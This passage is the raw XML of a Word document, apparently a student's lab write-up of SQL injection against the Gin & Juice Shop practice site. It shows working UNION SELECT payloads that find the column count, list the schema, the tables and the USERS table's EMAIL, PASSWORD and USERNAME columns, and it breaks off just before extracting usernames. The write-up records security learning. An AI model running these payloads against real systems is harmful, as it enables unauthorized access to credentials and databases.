      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">When i use 8 columns this give me </w:t>
      </w:r>
      <w:r w:rsidRPr="009C298B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>result</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C298B" w:rsidRDefault="009C298B" w:rsidP="004023AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5975350" cy="3498389"/>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s - Gin &amp; Juice Shop — Mozilla Firefox 10_22_2024 11_17_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8481" cy="3500222"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C700EC" w:rsidRPr="00C700EC" w:rsidRDefault="009C298B" w:rsidP="00C700EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">But when is use less than 8 columns that give me </w:t>
      </w:r>
      <w:r w:rsidRPr="00A137BC">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Internal Server Error</w:t>
      </w:r>
      <w:r w:rsidR="00C700EC">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C700EC">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">so </w:t>
      </w:r>
      <w:r w:rsidR="00C700EC" w:rsidRPr="00C700EC">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Number of Columns is 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C298B" w:rsidRDefault="009C298B" w:rsidP="009C298B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C298B" w:rsidRDefault="009C298B" w:rsidP="009C298B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">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s - Gin &amp; Juice Shop — Mozilla Firefox 10_22_2024 11_17_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rsidR="009C298B" w:rsidRDefault="009C298B" w:rsidP="00E56602">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next step i </w:t>
      </w:r>
      <w:r w:rsidRPr="009C298B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>determine</w:t>
      </w:r>
      <w:r w:rsidR="0075418C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> col</w:t>
      </w:r>
      <w:r w:rsidRPr="009C298B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>umn</w:t>
      </w:r>
      <w:r w:rsidR="0075418C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009C298B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> datatypes</w:t>
      </w:r>
      <w:r w:rsidR="00E56602">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E56602">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>by put ‘a’ in each column and show result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E56602" w:rsidRDefault="00E56602" w:rsidP="00E56602">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E56602" w:rsidRDefault="00E56602" w:rsidP="00E56602">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">When i put ‘a’ in first column and 4,5,6,7,8 that give me </w:t>
      </w:r>
      <w:r w:rsidRPr="00A137BC">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Internal Server Error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E56602" w:rsidRDefault="00E56602" w:rsidP="00E56602">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6597650" cy="323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s - Gin &amp; Juice Shop — Mozilla Firefox 10_23_2024 5_21_4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7650" cy="3232150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D957B9" w:rsidRDefault="00E56602" w:rsidP="00E56602">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">When is put ‘a’ in 2 and 3 column </w:t>
      </w:r>
      <w:r w:rsidR="00D957B9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>that give result</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E56602" w:rsidRDefault="00D957B9" w:rsidP="00E56602">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6742936" cy="32448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s - Gin &amp; Juice Shop — Mozilla Firefox 10_23_2024 5_56_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3981" cy="3269414"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E56602">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC7255" w:rsidRPr="005655A6" w:rsidRDefault="00FC7255" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Then i</w:t>
      </w:r>
      <w:r w:rsidR="0075418C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0075418C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> use column number 3 to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC7255">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Use UNION Atack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005655A6" w:rsidRPr="005655A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Using :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC7255" w:rsidRDefault="00FC7255" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC7255">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT NULL,NULL,GROUP_CONCAT(schema_name),NULL,NULL,NULL,NULL,NULL FROM information_schema.schemata </w:t>
      </w:r>
      <w:r w:rsidR="00C700EC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC7255" w:rsidRDefault="00FC7255" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6837935" cy="46609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s - Gin &amp; Juice Shop — Mozilla Firefox 10_23_2024 6_46_23 PM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6848359" cy="4668006"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00873A56" w:rsidRDefault="00873A56" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">As it show we reach to </w:t>
      </w:r>
      <w:r w:rsidR="00121179" w:rsidRPr="00121179">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>schema name is PUBLIC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00337896" w:rsidRDefault="00337896" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00337896" w:rsidRDefault="00337896" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C700EC" w:rsidRDefault="00C700EC" w:rsidP="005655A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="00337896" w:rsidP="005655A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00337896">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>we catch three table (</w:t>
      </w:r>
      <w:r w:rsidR="005655A6" w:rsidRPr="005655A6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">PRODUCTS </w:t>
      </w:r>
      <w:r w:rsidR="005655A6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="005655A6" w:rsidRPr="005655A6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TRACKING </w:t>
      </w:r>
      <w:r w:rsidR="005655A6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="005655A6" w:rsidRPr="005655A6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>USERS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="005655A6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> using :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005655A6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT NULL,NULL,table_name,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema ='PUBLIC' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6769100" cy="512021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s - Gin &amp; Juice Shop — Mozilla Firefox 10_23_2024 10_23_33 PM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6777897" cy="5126871"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="005655A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="005655A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="005655A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="005655A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="005655A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="005655A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="005655A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00337896">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>we catch three columns (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>EMAIL</w:t>
      </w:r>
      <w:r w:rsidRPr="005655A6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PASSWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="005655A6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>USERNAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) using :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRDefault="005655A6" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005655A6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT NULL,NULL,column_name,NULL,NULL,NULL,NULL,NULL FROM information_schema.columns WHERE table_schema ='PUBLIC' AND table_name = 'USERS' </w:t>
      </w:r>
      <w:r w:rsidR="00C700EC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005655A6" w:rsidRPr="00337896" w:rsidRDefault="005655A6" w:rsidP="00FC7255">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6779117" cy="3688056"/>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ucts - Gin &amp; Juice Shop — Mozilla Firefox 10_23_2024 7_09_5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31619" cy="3716619"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C298B" w:rsidRDefault="009C298B"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Pr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA6F24" w:rsidRDefault="00EA6F24" w:rsidP="004023AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0075418C" w:rsidRDefault="0075418C" w:rsidP="004023AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="0075418C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>column and catch it using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075418C" w:rsidRDefault="00EA6F24" w:rsidP="0075418C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
